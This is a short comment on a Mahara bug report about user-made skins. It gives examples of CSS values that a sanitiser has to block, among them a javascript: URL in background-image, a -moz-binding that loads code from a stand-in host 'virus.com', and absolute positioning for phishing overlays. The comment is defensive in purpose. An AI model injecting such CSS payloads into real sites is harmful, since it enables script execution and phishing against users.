Mahara

  1. Bug #1264098
  2. Comment #4

Comment 4 for bug 1264098

Revision history for this message
Son Nguyen (ngson2000) wrote : Re: skins not saving properly

Some css properties and their values need to be sanitized to prevent injections or phishing
For example,

background-image: url(javascript:alert('Injected'));
-moz-binding: url('http://virus.com/htmlBindings.xml');
position: absolute;

See more at https://code.google.com/p/browsersec/wiki/Part1#Cascading_stylesheets